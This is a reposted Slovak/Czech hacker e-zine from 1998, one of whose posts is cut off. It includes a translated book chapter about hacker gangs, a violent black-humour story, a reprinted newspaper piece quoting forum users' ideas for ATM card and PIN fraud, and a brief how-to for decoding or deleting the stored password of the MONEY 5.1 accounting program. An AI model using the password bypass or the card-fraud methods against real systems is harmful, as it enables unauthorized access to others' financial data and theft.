Eli hovori ze ked sa Phiber Optik dostal do Legion of Doom, tak Phiber
Optik musi byt dobry. Musis byt minimalne odvazny ak by si chcel takemuto
chalanovi vobec zavolat. Musis si byt sebou isty, nebat sa ze ti takyto
chalan proste zavesi, alebo este horsie, ze bude pocuvat co hovoris
a potom ta zosmiesni. Musis mat slusnu davku sebaistoty.



"Zavolajme mu," hovori Eli.



Paul hovori ze OK.



"Co chces ?" pyta sa hlas. "Ja som Phiber Optik z LOD". Keby si to pocul,
myslel by si si ze je to sam Wizard of Oz. Phiber Optik z LOD. Paul a Eli
to pocuju, tu silu v dunivom hlase ktory odpovedal v telefone.



Nuz Eli sa raz "stretol" s Phiber Optikom na bulletin boarde. Ale to je
teraz mala utecha, v situacii ked je na druhej strane linky skutocny
zivy clen Legion of Doom, hromzivy a agresivny. Ak sa nepacis takemuto
chalanovi, moze z teba spravit zabu - alebo minimalne zmenit ti domaci
telefon na telefonnu budku. Kazdy hacker pocul tie story, o nejakom
chudakovi, ktoreho mama raz zdvihla v kuchyni telefon aby zavolala Linde
v susedstve a namiesto oznamovacieho tonu pocula v telefone nahraty hlas,
"Prosim vlozte do automatu 25 centov." No a teraz to vysvetli mame. Ale
nie ze by Phiberova odpoved bola totalne neocakavana. Ako vie ze nema na linke
dvojicu lamerskych wannabe ? Casto mu taky niekto volava. Odkedy sa rozhlasilo
ze je v Legion of Doom, jeho telefonne cislo sa v podsveti roznieslo.



Co Eli a Paul chcu od Phibera ? Je to zjavne. Poculi ze je to ten chalan,
co bol na telefonnych ustredniach. Ale to je jednoducha odpoved.
Vlastne chcu omnoho viac, nie ? Chcu aby ich naucil nielen o telefonnom
systeme, ale tiez o sofistikovanych pocitacoch ktore crackol, o neznamych
prikazoch ktore dokaze napisat, alebo o tom ako funguje jeho mysel.
Chcu vediet to, co chcu akykolvek dvaja chalani s trochou znalosti a s velkou
zvedavostou. Chcu vodcu, ktory by im ukazal cestu.



Phiber rad vyucuje. "Chcete sa stretnut ?" pyta sa.



A Paul si mysli. Kto je tento chalan ?



Coskoro sa dozvedia Phiberovo ozajstne meno: Mark Abene.



Su wannabe kyber gangy, potom su skutocne kyber gangy, ktorych clenovia
striekaju a skriabu svoje hrde graffiti po elektronickych bulletin boardoch.
Ziadny gang nie je skutocnejsi, znamejsi, ako Legion of Doom. Jeho zakladatel
je legendarny Lex Luthor - mysteriozny vodca ktory byva niekde na Juhu.
Jeho kolega je Texasky tyro, ktory pouziva nick Erik Bloodaxe, meno ktore
sa da urcite lahsie zapametat ako jeho skutocne meno, Chris Goggans.



Legion of Doom je najlepsi z najlepsich z 50 statov. Ako sa moze niekto
stat clenom ? Nie je to tak ze si porezes prst a skrizis krv s Chrisom
Goggansom. Clenovia gangu na elektronickej frontiere neziju v tom istom
state, nespoznali by sa keby stali vedla seba v autobuse. Nuz takto sa
Mark Abene dostal do Legion of Doom. Aj ked Mark sa zaprisahal ze pred
tym ako sa dostal do LOD nikdy nehovoril s Chrisom, takto na to spomina
Chris (Mark zvycajne tvrdi ze Chris keca blbosti): jedneho dna pred
par mesiacmi, dole v Texase kde bol vtedy ako vysokoskolsky student,
Chris si vsimol ze Mark Abene sa podpisoval pod svoje postingy ako
"Phiber Optik z LOD". A Chris si myslel, co je zac toto decko ?



Okamzite zavolal na sever.



"Cau, je tam Mark?"



"Jo."



"Toto je Chris - Erik Bloodaxe," hovori Chris. "Preco do pekla sa podpisujes
ako clen LOD ? Nie si v LOD."



Mark sa na sekundu zamyslel a potom pevne odvetil "Ja som v LOD."



"Nikto nie je v LOD pokial o tom vsetci nehlasujeme," opravil ho Chris,
ktory vysvetlil "pravidla", okrem ineho aj nevyhnutnost neanonymneho
hlasovania.



Potom z nejakeho dovodu sa ton konverzacie presunul na to o co sa
obaja teenageri naozaj zaujimali: hackovanie telefonnych firiem.
A Chris si uvedomil ze Mark naozaj vie tolko ako ludia o nom hovorili,
hadam aj viac. Tento chalan bol dobry.



Samotne hlasovanie prebehlo o par tyzdnov neskor. Mark sa dostal dnu.



Ako hocijaka tlupa chalanov zo skoly v tieni The Dirty Dozen, Hogan's
Heroes a Mission Impossible, clenovia LOD mali medzi sebou specialistov
na nejake temne umenie. Jeden clen vedel ako sa vyraba red box, zariadenie
montovane z tajnych suciastok z Radio Shack (pozn. prekladatela - obchod
s elektronikou) ktore simuluje vhodenie mince do telefonneho automatu.
Dalsi moze byt expert na programovanie v Cecku. A Mark ? Dokaze sledovat
routovanie telefonneho hovoru z New Yorku do Pariza, oblubujuc technicke
detajly. Dokaze detajlne popisat rozne typy pocitacov ktore riadia rozne
aspekty telefonnej spolocnosti. Pozna vyznam vsetkych tajuplnych skratiek
v telekomunikacnom priemysle: MIZAR, COSMOS, SAG, LMOS. Dokaze vysvetlit
hocikomu tajomstva telefonnych systemov. Oblubuje detajly.



A v 1989, Mark ma iba 17 rokov.



Pravdu povediac, zopar clenom sa prilis nepaci tento novy clen. Je
sebavedomy a ma to, co zopar ludi z Juhu vidi ako "New Yorske spravanie".
A ma v pazi co si kto mysli.



Ak sa Phiber Optik zastavi na nejakom bulletin boarde s poznamkami o tom
alebo hentom tajomstve telekomunikacnej firmy, ostatni hackeri hned
vyslu spravu: Phiber je tu. Tento board je hot. Zide sa kopa ludi.
Telefonne linky su obsadene. Hackeri dookola volaju, s pouzitim redialu,
skusaju cokolvek aby sa dovolali cez obsadzovaci ton, odbytny ako vyhadzovac
v nocnom klube.



Phiber sa tusim vyziva v tom ze zosmiesnuje hackerov ktory zverejnuju
dezinformacie. Rad vysvetluje blbcom ktori si myslia ze COSMOS je nejaky
tajny kluc do kralovstva telefonnej spolocnosti. (Uh, to meno znie
dolezito, nie ?)



Ludia si to zacinaju vsimat. Ako Chris Goggans. Jedneho dna v 1989, on
a jeho priatel, Dr. Who, spolu kecaju na jednej hot BBSke,
ktora sa vola The Phoenix Project. A vidia ako Phiber Optik z LOD zosmiesnuje
nejakeho chudaka zaciatocnika.



A to je to co si Chris o Markovi myslel: ozajstny arogantny, vychytraly
zasran.



Mark a Chris sa nikdy nezhodli. Mark dostane vyhadzov z Legion of Doom.



Mal malu hadku s Chrisom a Chris ho zacal ohovarat pred ostatnymi clenmi
LOD. Sprava o Markovom vyhadzove sa rozchyri po celom podsveti. Ako sa to
stalo ?



Riadna bitka. Chris povedal Markovi ze mu slohol nejaku informaciu,
Mark tvrdi ze Chris nevie o com hovori. Kto vie ? Ale je to postnute
na BBSkach odtialto az po Nemecko. Je to tema rozhovorov hackerskej
elity: Phiber Optik sa dostal do potycky s Erikom Bloodaxom, a podla
Erika Bloodaxa, Phiber Optik prehral.



Eli premyslal.



Mozno je Legion of Doom elita iba preto ze existuje. Ak to nie je jediny
gang v undergrounde, je to urcite jediny ktory ma za sebou dekadu
existencie a tucty clenov po celej zemi ktore pocuvaju Texaskeho vodcu.
Je najvacsi. Je najhorsi. (To zatial vieme.) Ale ak ina skupina hackerov
ohrozi primat Legionu - nuz ktovie co sa moze stat ?



Existuje napad ktory dostal uz davnejsie, ale nakoniec jeden den v lete
1989 ho povedal Paulovi do telefonu.



"MOD," hovori Eli.



"Mod?" pyta sa Paul.



"M-O-D," hovori Eli, hlaskujuc pismena.



A to je co ?



"Mali by sme sa volat MOD," hovori Eli. Je to ako zart. Je to vztyceny
prostrednik voci LOD. Vysvetluje ze je to parodia na LOD, Legion of Doom.
Z L na M, dalsie pismeno v abecede, novy "kewl dewds" kyberpriestoru.
Chlapci z New Yorku su opak chalanov z Texasu. Ako lepsie by sa definovali ?



Chalani z New Yorku lahko urcia co by mali robit tak, ze pojdu proti vsetkemu
za co stoji Legion of Doom. Markovi sa to bude pacit, ze ? Cokolvek
proti Legion of Doom. To teraz nie je dolezite. Co je dolezite, hovori Eli, je
ten zart: MOD. Nezalezli im na nicom. Znamena to vsetko. Masters of Disaster.
Mothers on Drugs. Masters of Deception.



Masters of Deception o tom nevedia, ale v lete 1989 su zoci-voci vacsiemu
nebezpecenstvu ako je Legion of Doom. Spolocnym stretnutim v Eliho izbe
pocas jednej neskorej noci na hacking session ktora vedie k hacknutiu
pocitaca vlastneneho telefonnej firmou, priputaju na seba pozornost dvoch
najlepsich muzov zakona v kyberpriestore: vysetrovatelov New York Telephone
Toma Kaisera a Freda Staplesa.



Kaiser, ktory monitoroval telefonne linky niektorych teenagerov cele mesiace,
sa jedno skore rano v Auguste 1989 prebudil, a pomyslel si: dnes moze byt ten
den kedy konecne dostaneme tych hackerov. Uz citi letne horko cez svoje
tricko ked odchadza z domu na Long Islande aby stihol skory vlak do
Manhattanu. Toto rano povie Federalom o svojom pripade.



Velku zasadaciu miestnost ktoru si rezervoval, najde Kaiser plnu ludi
okolo telefonej spolocnosti a ich pozvanych hosti - vysetrovatelov z
New Yorkskej policie z oddelenia specialnych pripadov a ludi z US Secret Service.



Vediac ze technicke aspekty tohoto pripadu mozu byt tazke na pochopenie
pre ne-technikov, Kaiser a Staples vysvetluju pripad vseobecnymi slovami.



"Ideme za vami s jednym pripadom, ktory tu mame... a ako by sme na to
mali ist ?" pyta sa Kaiser.



"A co vlastne mate ?" pyta sa jeden z federalnych vysetrovatelov.



"Mame troch hackerov," hovori Kaiser.



Mark, Paul, a Eli.



Ale este prebehne niekolko mesiacov pred tym ako niekoho usvedcia.



...dokoncenie v buducom cisle...



preklad z knizky Michelle Stallovej a Joshua Quittnera, prelozil k0lik(at)email.cz


navrat na obsah



je mi to jedno



Bim BaM, Bim Bam ... To strasne zvonenie
v hlave nje a nje prestat.... Janaa prestan kriciiim na svoju
sestru ..... Vrrrrrrrrr do riti ved ja ziadnu sestru nemam ... Zacinam byt
wolajako dezorientovany .... V poslednom case stracam prehlad
o vsetkom , dokonca aj o makrobiologickom prieskume v Dolnej
polome ... Kam to spejem .... Bodla by sprxa..... a sekera



Wrrrrrr , momentalne som zistil ze uz newiem
zistit absolutne nic , esteze som sa poistil, pre pripad ze by to zvonenie
v hlave prestalo.... ..........



Rozbil som telku , newiem co ma to chytilo ale
dostal som take brutalne nervy, ze som to proste newydrzal .....




Ked prisiel foter, skoro ma zabil .... Powedal
som mu ze spat skludom moze aj pri mame a on mi jednu vrazil
,..... kua ... Uz viem z coho mam to zwonenie w hlave.... Zo
zakrvavenym trickom som pomaly balil fotra do igelitu ... Fucking
world ... Cely som od krvy ale srat ma tu nikdo nebude .. Akoze tu
facku – dve som zniesol v pohode ale to, ze my resetoval linux, to
bolo aj na mna wela.... chudinka PP06.... Stala ma dve vodky a 1 pagac...
Ten pagac som vykseftil za bratov osuxany casopis minicat ....



Linux je w riti .... Disk hlasi nejaku chybu
... wobec v sebe nebadam znamky lutosti za to co som spravil....



Po prestudovani HTML z priliehavym
nazvom MURDERS som dokoncil moje dielo .... Na tom internete sa clovek
dozvie naozaj vsetko .... Rozhodol som sa ze budem rebel ... Budem
pluvat na chodniky , nadavat ucitelom a smiat sa policajtom ....
a nebudem mat ten skurweny windows....



Porozbijal som wsetky okna na protest proti
Microsoftu ... Akoze susedia sa cudovali ale ja som im powedal nech
sa staraju o seba a ignoroval som ix. .... Za dalsi
sposob uznania rebelanstva som powazowal striekanie neslusnych slov
v spojeniach z Microsoftom ...... Bum



Zobudil som sa na policajnej stanici ... Sprej
my nezobrali tak som zo zvyku nastriekal I hate Microsoft ...
Strasne ma dobili .... newladzem sa ani pohnut ... Boha je my zle .
Na polici som tvrdil ze ten napis som naozaj ja nenastriekal .... Zase ma
zbili ... skkurveny fizli......Hm akoze ked ma konecne doviezli domov za
1. Som nemal cim striekat a za 2 som nemal ako striekat lebo som mal
obe ruky zlomene .... po lici mi stekal maly pramienok krvi ... PP06 tka
je mrtva ... co uz ale newiem ci budem mat dost igelitu aj na nu ....




Wytah som brutalne doflusal, robilo my to
extremnu radost. Na zaver som ogrcal tlacitka a veselo som vyhupol
von . Zapalil som si jointa a zacalo ma drhnut , tak som w samoske
lopol plechovku Coca Coly .... Vypil som ju na ex stale som smedny boze
ten joint bol brutalny a ujebal som este jednu .... znova som sa
vygrcal... zeby v tom bola nejaka suvislost ? Zaznacil som si do
diara : NikDY VIAC nespajaj JOINTA a CoCa colu ... Ono miesat drogy
by sa naozaj nemali .... zacalo sa zmrakat wonku som widel matne sa
pohybujuce tiene wolajakych galganow , potmehudsky sa dohodujuc a tak
debilne gestikulujuc ze uz aj Vinetue by poxopil ze sa jedna
o diilerov... Dneska bol Windows po 350... kua zase isli disky
hore ....




Bola za mnou socialna kuratorka a pytala
sa ma somariny .... Bola celkom pekna a ja som nesulozil ani
nepametam .... Zacal som ju balit. Po pol hodine vstala a odisla
no ja som si stihol vypytat je telefon keby sa njeco stalo . aj tak
z toho nic nebude a prilepil som si na zastavku dalsi otrhany
listok z telefonom ... Chcel som zapnut video ale bolo my to na
prt lebo bola rozbita telka.... Pice to som si neuvedomil ... Ziadne
porno dnes nebude pomysliac si tuto tupost som si obul bakandze nahodil
bundu a odvrknuc "Von" na maminuotakzu "kam ides ?" som sa vytratil
z bitu ...




Zase ma dobili ..... tentokrat to boli dilery ...
Vcera som im lopol dva disky ... dnes si ma pockali .... ledva sa hybem
boze ...




bloody, www.bloody.sk


navrat na obsah






00000001000001020061730200619236
pajkus
 pajkus      03.03.2004 - 13:26:54 , level: 1, UP   NEW



::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #9, 11.11.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/



obsah



intro

prevratny exploTransfer interrupted


00000001000001020061730200619225
pajkus
 pajkus      03.03.2004 - 13:23:41 , level: 1, UP   NEW




::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #8, 16.7.98, prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



intro

bankomaty

slovenska policia pritvrduje

jak se dostat do MONEY 5.1 kdyz neznam heslo

hysteria navigator faq







intro



prielom 8 je celkom malinkaty a vcelku narychlo pozliepany.. to viete..
obdobie dovoleniek.. ja padam prec na dlhsi cas, tak aspon toto.. dalsie
cislo hadam ku koncu augusta..


pajka




bankomaty


tento clanok vysiel v denniku Novy Cas... odstrihol som z neho taky ten
klasicky nudny uvod typu "co je to
internet" a "kdo je to hacker"..




Od sexu az ku kradeziam ?

Osobny pocitac bez krabicky zvanej modem, pripomina luxusne auto stojace
uprostred pola. Modemy umoznuju po beznej telefonnej linke vysielat signaly zrozumitelne
pocitacu a takto si vymienat programy, odkazy, udaje, apod. Nielen
medzi dvomi znamymi, vlastniacimi modemy, ale jestvuje tiez viacero celosvetovych
sieti, ktore takuto komunikaciu umoznuju. Jednou z nich je neprofesialna FIDONET,
s centrom v USA. Jej region 42 tvoria Cechy a Slovensko. Nadsenci PC tu zivo debatuju
v desiatkach konferencii, cize rozlicne zameranych tematickych okruhoch.
Od konferencie nazvanej Kamasutra, ktorej napln netreba opisovat, cez Gaming,
v ktorej hAbaju nad svojimi starostami fanatici pocitacovych hier, az po Hardware,
kde zasa mozno hladat dobru radu ak nefunguje stroj, tiez su tu napady na
rozne technicke zlepsovaky. Dvadsiateho siedmeho jula tohto roku bolo mozne prvy
raz zaregistrovat zaujimave rozhovory, nasvecujuce... Radsej odcitujme niekolko
pasazi, kvoli zrozumitelnosti mierne upravenych.



Pirati diskutuju

Evzen P. spoza Moravy, dava do eteru otazku : "Je tady nekdo, kdo vi , co a jak
se zaznamenava na bankomatovou kartu ?" Skusenejsi kamarat zo Slovenska ho cez
terminal hned poucil : "V prvom rade musis rozlisit, ci ide o off-line system
, teda samostatne, do siete neprepojene bankomaty /u nas Sporitelna, aj v Cesku/,
alebo on-line, cize ostatne, zapojene do spolocneho systemu bankomatov. U on-line
na karte osobne cislo majitela /PIN/ byt nemusi, kedze bankomat sa nanho hned
moze cez linku spytat ustredia. U off-line tam PIN je, zrejme zakodovany, ale
v principe je to jedno. Pokial by si poznal postup verifikacie v bankomate, nebol
by problem s pocitacom vyskusat vsetky moznosti a najst tu spravnu.Aktualizacia
zoznamu neplatnych karietsa deje tak, ze tie neprepojene off-line bankomaty
obehne manik s disketou." Z ceskych krajov hned reagoval dalsi : "Byl by zajem i
o kompletni konstrukcni popis. A priloz i seznam nejakych vhodnych uctu i
s heslama. Prosim vas, a nikomu to nerikejte, kdo neni ve FIDU. Ono i tak bude
dost napadny, ze vsichni kdo maji modem maji najednou nejak moc penez." Rozhovory
pokracuju i dalsie dni. Evzen pise Ladovi Z. : "Je to mozny a proveditelny. Spusob
zapisu dat je pro jeden typ bankomatovych karet konstantni. Staci sehnat popis
struktury zaznamu a zarizeni, ktery to dovede precist.Pak kdyz mas kartu,
vyskousis pomoci computeru vsechny moznosti, a NAJDES PIN. Slysel jsem, ze se to
nekolika lidem v SRN uz povedlo. Kdyz budes mit k dispozici to co jsem napsal,
tak je to otazka nekolika malo vterin !" Do reci prispieva zas dalsi ucastnik
: "Mnohem zajimavejsi je zmenit cislo karty a teprve pak vybirat penize." Vaclav
V. dodava do debaty zaujimave veci : "Nejmenovany kolega tvrdi, ze na cteni
magneticke stopy z karty staci hlava z kazetaku, pripadne hlava z disketove
jednotky." Jindra K. daval rozumy Petrovi P. : "Na karte je zapsano, kolik jsi
ten den vybral. Takze kdyz ji po vybrani uvedes do puvodniho stavu /ctecka i zapisovacka
se daji koupit/, muzes vybirat zase..." Nasledujuci kazisvet zasa spekuloval
ako vyuzit fakt, ze off-line bankomaty nevedia o penaznych operaciach
urobenych na ostatnych bankomatoch, hned. Az ked k nim pride raz za den zamestnanec
obnovit data. Spekulant objavil, a po sieti Fidonet oznamil takuto metodu
: "Zalozim si treba deset kont. Necham si na kazdy udelat kreditni kartu. Na
kazdy konto si dam par penez. Pujdu a vyberu si z kazdyho bankomatu po 2000."
Slovak Roderik P. dodava : "V kazdom bankomate je zoznam platnych kariet spolu
s ich PIN..." Tolko snad staci na ukazku toho, co vrta v hlavach niekolkych desiatok
mladikov. Do odbornych podrobnosti zabiehat nemusime, ostatne chlapci po
kratkom case presli z tzv. echomail sposobu zasielania si sprav, ktory je volne
pristupny , na netmail. Ten uz zarucuje istu dovernost a utajenie pred sirsim
publikom.



Len otazka casu

S vypismi obsahujucimi spomenute, i dalsie pasaze, sme zasli do kosickej firmy
Lynx, kde pracuje medzinarodne uznavany a znamy odbornik na pocitacovu
bezpecnost, RNDr. Michal Danilak. Pri citani desiatok metrov papierovych pasov
vazne pokyvoval hlavou : "Tak to uz mame aj u nas. Ked to na zapade prinasa tolko
starosti, preco nie i tu ? Ceski a slovenski pirati ocividne ozivaju. Hlavnym ich
problemom zatial ostava nedostatok technickych informacii. Je vsak len otazkou
casu a snahy, kedy dokazu uskutocnit svoje zamery. Nemaju zatial dostatocne napojenie
na celosvetovu hackersku siet, aby odtial cerpali. Nemaju ani v potrebnej
miere socialne spracovanych tych odbornikov, ktori bankomaty instaluju a prevadzkuju.
V zahranici mozno v tomto smere hovorit o skutocne profesionalnom socialnom
inzinierstve, ktore hackeri pouzivaju, aby zo zasvetenych ludi vytiahli
informacie. Znamena to nadviazat doverny psychologicky kontakt s kolegom od
fachu, pracujucim napriklad v banke, a pri veceri z neho pocas rozhovoru tahat
tajne informacie. Alebo hoci si najst ucelovo v penaznom ustave frajerku. Toto su
vsak iba docasne prekazky. Je velmi pravdepodobne, ze uz tie postupy, nad ktorymi
premyslaju momentalne, by nasli v praxi uplatnenie. Najvacsie nebezpecie moze
hrozit bankomatom, ktore nie su prepojene do siete, teda najma pristrojom Slovenskej
sporitelne. Nasa policia ma teraz dost inych starosti, nez skumat high
- tech kriminalitu. Vyzaduje si to totiz nielen najvyssiu odbornost a dlhodobe
studium, ale aj narocne technicke vybavenie."



Ako to robia profici

Bude uzitocne nahliadnut do metod pouzivanych v krajinach, kde kriminalita spojena
s bankomatmi nie je uz novinkou. V jednom europskom state stal na ulici
"stedry" bankomat. Nevydaval sice peniaze, ale po zasunuti kreditnej karty a zadani
jej identifikacneho PIN cisla vyplul balicek cukrikov. Deti hned zacali
tajne brat rodicom karty a podho ku plechovemu "Mikulasovi". Prefikancom, ktori
ho postavili slo o jedine : ich stroj zosnimal a ulozil si do svojej pamate
vsetky udaje z danych kariet. Potom uz nebolo najmensim problemom vyrabat ich kopie...
Podobne si pocinali darebaci pred jeden a pol rokom vo Velkej Britanii. Tam
ukradli cely bankomat a po case ho instalovali inde. Opat mal jedinu ulohu vo
vychytavani udajov z pravych kariet. Podvodnici vdaka nemu stihli vyberat z kont
majitelov az 40 tisic libier tyzdenne. Uplne jednoduchy sposob spociva v ukradnuti
karty sikovnymi prstami vreckara, potom, co cez plece nepozorneho klienta
odpozerali, ake cislo PIN zadava do bankomatu. Primitivnejsi pachatelia potom
proste vyberu sumu a kartu zahodia. Ti prefikanejsi, clenovia dobre organizovanej
bandy, kartu ihned skopiruju a vreckarskou metodou nic netusiacej obeti zasa vratia.
Ta sa potom moze len cudovat, kam miznu z jej konta peniaze. Preto je dobre,
ak ma kazdy clen rodiny vlastnu kartu. Ovela skor totiz moze zbadat nejake podozrive
javy. A este pozor na jedno vazne nebezpecenstvo. Identifikacny znak PIN
pytaju od pouzivatela karty vylucne bankomaty. Pri plateni za tovar v obchode ho
uvadzat netreba. Staci mat ozaj len tu kartu. Vlastnu alebo cudziu.



Bankari zatial pokojni

Prva dostala moznost komentovat nase zistenia manazerka kosickej pobocky
Ceskoslovenskej obchodnej banky, a.s., Ing. Zdena Gacikova : "My mame bankomatov
zatial malo, iba styri. Vsetky prepojene on-line. Funguju na medzinarodne platne
karty zdruzenia Eurocard - Mastercard. Limit vyberu moze cinit na den az 50 tisic
korun, zavisi od bonity klienta. Od buduceho roku pribudne postupne dalsi pridavny
bezpecnostny kod, ktory dalej zvysi stupen ochrany." Ake rizika su spojene
s platenim v obchodoch, vysvetlila ing. Gacikova takto : "V obchode platitel naozaj
nepotrebuje uviest svoje cislo PIN, teda iste riziko tu je. Nie vsak tak
velke, ako vy sa na prvy pohlad zdalo. Kazdy obchodnik ma totiz svoj limit, po
ktory vyda tovar bez overenia karty. Ked chce zakaznik nakupovat za viac, vola
predajca bratislavske autorizacne centrum. Vysku limitu pozna len sam obchodnik.
Takze zlodej karty, ak nechce riskovat skore chytenie, mohol by bez vacsieho rizika
kupovat len za male sumy, povedzme do 500 korun. Vela skod by teda az do
zablokovania karty ani nestihol narobit." Namestnik riaditela Vseobecnej uverovej
banky Kosice, JUDr.Mgr. Jan Rybarik, uviedol : "My obhospodarujeme na Slovensku
160 bankomatov, vsetky prepojene on-line. Od augusta funguje v Bratislave Autorizacne
centrum Slovenska. Prinos tejto centralizacie spociva v tom, ze aj klienti
inych bank budu moct pouzivat bankomaty VUB a naopak. Nevieme zatial o utoku na
nas pristroj. Su chranene jednak svojou robustnou konstrukciou,ale aj napojenim
cez linku priamo na policiu. Pri naruseni si automaticky privola pomoc. Koniec
koncov, aj keby akosi predsa ukradli cely bankomat, cisla uctov a kody v nom nenajdu.
" Na otazku, kolko korun vojde do jednej takej ocelovej skatule, J. Rybarik
prezradi len tolko : "Nepoviem, lebo by sme len lakali chmatakov. Ale v zavislosti
od typu statisice, aj cez milion."



Policia len zacina

S celou kopou zisteneho mierime na policiu. Ako bolo mozne cakat, nijakeho kompetentneho
specialistu na pocitacovu kriminalitu tu niet. Po mensej anabaze cez
uradnikov, ktori si prehadzuju problem ani horuci zemiak, koncime u riaditela
Uradu financnej policie PZ SR, JUDr. Ignaca Behula. "Je to pre nas uplna novinka",
priznava. "Cakal som, kedy zacne pocitacova kriminalita v nasich koncinach,
ale ze prave cez bankomaty...Preskumame o co ide." Konecne slovo o sucasnom
stave vysetrovania povedal I. Behul pred niekolkymi dnami : "Nadviazali sme spolupracu
s ceskou policiou, kedze tazisko hackerskych aktivit sa sustreduje u
nich. Boli uz prve spolocne konzultacie". Na otazku, ci teda zacne preventivne
sledovanie tychto diani,napriklad konspiracnym nasadenim policajnych agentov do
piratskych komunit, krci plecami : "Je to velky problem. Nie sme dostatocne vybaveni
technicky ani personalne. Hodlame spolupracovat s odbornikmi aj z civilnej
sfery. Cesi su na tom o nieco lepsie. Verim, ze vdaka podchyteniu toho celeho uz
v zarodocnom stadiu predideme premene slov a spekulacii tych vymyselnikov v ciny.
" Co ma teda robit radovy obcan, majitel kreditnej karty ? V prvom rade davat
pozor, aby nikto nemohol odpozorovat jeho cislo PIN pri zadavani do bankomatu.
Rozumne je takisto ukladat peniaze do systemov prepojenych on-line. Tie su pre
potencialnych prienikarov ovela tvrdsim orieskom, nez tie neprepojene. A tiez dufat,
ze nasa policia v historicky kratkom case zisti, ze obusky uz na modernych
zlocincov nestacia.



navrat na obsah




Slovenska policia pritvrdzuje



Vo stvrtok 4.6.1997 kriminalna policia urobila prehliadku kancelarii
firmy Eurocomp v Bratislave. Stalo sa tak
na podnet BSA. Prehliadka bola zamerana na preverenie podozrenia ze v spolocnosti
Eurocomp dochadza k neopravnenemu kopirovaniu, rozsirovaniu a pouzivaniu pocitacovych
programov, ktorych autorske prava vlastnia clenske firmy BSA. Aliancia pred
casom dostala od anonymneho informatora indicie o tom ze na pocitacoch spolocnosti
Eurocomp su nainstalovane a pouzivane aj nelegalne kopie pocitacovych programov
od firmy Microsoft a inych clenov BSA. Spolocnost sa podla informacie mala zaoberat
aj pocitacovym piratstvom.



Anynymny informator bol byvaly pracovnik, ktory dostal padaka. Do Eurocompu
nabehlo asi 15 chlapikov v civile a pri vstupe do budovy sa preukazali povolenim
z okresnej prokuratury. Potom prikazali ludom vstat od pocitacov a zacali
prehliadku a fotografovanie. Nebola ziadna sanca na schovanie pocitacov alebo
vymazanie programov. Pokial sa niekto vzpieral, napr. ze nedostal nariadenie
od sefa, tak dvaja ludia s nim zostali pri pocitaci a dialsi isiel pre sefa.
Ja len dufam ze sa tu nenajde druhy kpt. Dastych.



rain, rainman(at)rainside.sk



navrat na obsah




Jak se dostat do MONEY 5.1 kdyz neznam heslo



Program MONEY pro vedeni ucetnictvy asi vetsina zna. A tak by se nekomu
mohlo hodit vedet, jak se do neho dostat pokud nezna heslo. A presne o tom je
tenhle clanek.
Sedel jsem si takle u kamose u pocitace a on me rika, ze vyhodne koupil
hardisk a ze prej ho melo pred nim spustu lidi. A tak ze se na nej kouknem
jestli tam neni neco zajimaviho. Tak sme zacali prochazet hadr a narazili
jsme na money 5.1. Rikame si tak 'parada treba tam budou nejaky zajimavy
data'. Tak to spustime a najednou ta strasne otravna hlaska 'ZADEJTE HESLO'.
A tak si rikam to teda ne, dokud se tam nedostanu nendu dom. Nastesti to
bylo lehci nez sem cekal. Heslo je ulozeny v souboru databazepristup.dat.Na
adrese 9Ah(154d) je ulozena delka hesla(coz ma fungovat asi jako kontrolni
soucet :) a od 9Bh(155d) je zakodovane heslo. Dekodovani je naprosto
jednoduche xor 181, no a z toho vam vyjde
ASCII cislo dekodovaneho znaku. V praxi to vypada asi takto:


00009A: 06 C6 DE CC DB D0 C1 => heslo je SKYNET

BTW:nezalezi na velikosti pismen. Pokud vam ale de jen o to se tam dostat a heslo
uplne znicit staci smazat tyto 3 soubory:

pristup.dat
pristup.ix
pristup.bpf

Pokud je tam vice tuzivatelu, tak heslo u kazdeho dalsiho uzivatele je posunute
v souboru pristup.dat o +65h(101d).



t_man


navrat na obsah




hysteria navigator faq
(
http://hysteria.sk/nav )




pridavani odkazu


pridavat odkazy do tohoto seznamu neni nic sloziteho. nejprve si vyberte
spravny adresar. doclickejte se tedy ke zvolenemu adresari a vyplnte
formular na pridavani dokumentu. do URL se zadava _cele_ url (vcetne
protokolu), tedy napr. http://www.underground.org/ . kdyz zadavate cestu k
adresari, uvadejte ji vcente lomitka ('/') na konci url. pokud '/' neuvedete,
bude browser muset delat dva http requesty - jeden na cestu bez lomitka,
server mu odpovi ze to je cesta_s_lomitkem - a druhy je uz na lomitkove url,
spravne. TITLE je strucny titulek, ktery bude odkazem. A DESC
je popisek odkazu. volte prosim popisky vystizne a kratke. V title i
description muzete pouzivat html tagy, pouzivejte jen takove, ktere
nenarusuji vzhled stranky. NEPOUZIVEJTE DIAKRITIKU!



mazani odkazu


pokud prestane nejaky odkaz fungovat, vymazte jej! do URL se zadava cesta,
jak je uvedena u odkazu. nefungujici odkaz je takovy, kde delsi dobu vraci
server 404 not found, popripade je server totalne down. !pozor! nez
usoudite, ze server je down, ujistete se, zda neni chyba u isp (cesnetum
nekdo shodil raba...), ci snad nejaky router neroutuje dokolecka, popripade
nekdo neprekopl kabelaz. pokud 404, skuste zjistit nove url.



mkdir/rmdir


muzete take samozrejme zakladat a mazat adresare. jmeno adresare muze byt
jakekoliv, ale nepouzivejte prosim diakritiku. url tohoto adresare bude
odvozeno z nazvu, tzn. budou vynechany znaky jako /.[]:,|*?`x20 :-) pokud
je adresar prazdny, muzete jej smazat. kdyz do nej vlezete, bude vam jasne
jak.



for internal use only


